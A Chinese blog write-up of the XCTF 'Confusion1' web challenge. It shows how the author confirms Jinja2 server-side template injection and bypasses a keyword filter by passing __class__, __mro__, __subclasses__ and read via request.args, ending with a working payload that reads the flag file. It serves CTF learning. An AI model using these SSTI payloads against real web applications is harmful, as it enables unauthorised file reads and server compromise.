xctf攻防世界 Web高手进阶区 Confusion1

1. 直接进入场景,查看环境

在这里插入图片描述

2. 分析

  1. 映入眼帘的是神马奇葩玩意?
    思考了一下,蟒蛇(Python)?大象(ElePHPant)?两个扭扯想说明啥?。。不懂
  2. 打开控制台,看看有没有提示
    戳一戳链接,发现longin页面和register页面都有如下信息
    在这里插入图片描述
    emmm,按时flag的位置?
  3. blue-whale是什么破玩意?
    点完后更加懵逼了,大胆猜测,需要审计源码,那么尝试.git漏洞,看能不能搞到源码,如图
    在这里插入图片描述
    得,没戏,看看robots.txt同样的显示,说明不能看到源码。
  4. 如何访问到提示的flag内容
    大胆猜测,需要尝试SSTI(服务器模板注入)漏洞,从而拿到flag。
    参考思路:在这里插入图片描述
    尝试构造payload,{{7*7}}
http://111.200.241.244:62326/register.php/{{7*7}}}

如图:
在这里插入图片描述
说明SSTI漏洞,继续测试{{7*‘7’}}

http://111.200.241.244:62326/register.php/{{7*'7'}}}

如图:
在这里插入图片描述
锁定,是Jinja2或Twig模板

  1. 采用之前使用的payload,{{’’.class.mro[2].subclasses()}}
http://111.200.241.244:62326/register.php/{{''.__class__.__mro__[2].__subclasses__()}}

弹窗提示:
在这里插入图片描述
也就是说,这些关键词被过滤了。。。class、 subclasses、 read尝试后都不行。尝试采用url_for

http://111.200.241.244:62326/register.php/{{url_for.__globals__}}

如图:
在这里插入图片描述
有鉴权,也就是被过滤了。给我直接整不会了。。。想不出来,去参考大神们的wp了。

  1. 采用request.args.key方式传参
    这个方法开眼界,第一次知道。构造payload:
http://111.200.241.244:62326/{{''[request.args.a]}}?a=__class__

如图:
在这里插入图片描述
妈耶,真的可以绕过,有回显了。。。这就可以玩了,构造目标payload

http://111.200.241.244:62326/register.php/{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

如图:
在这里插入图片描述
构造的参考理由:关于python魔术方法payload

3. 总结

  • 考察模板注入
  • payload的其他构造方法

附带大神总结的内容:

  1. 文末SSTI几个学习场景
  2. SSTI(模板注入)基础总结

如有问题,恳请批评指正。

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

l8947943

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值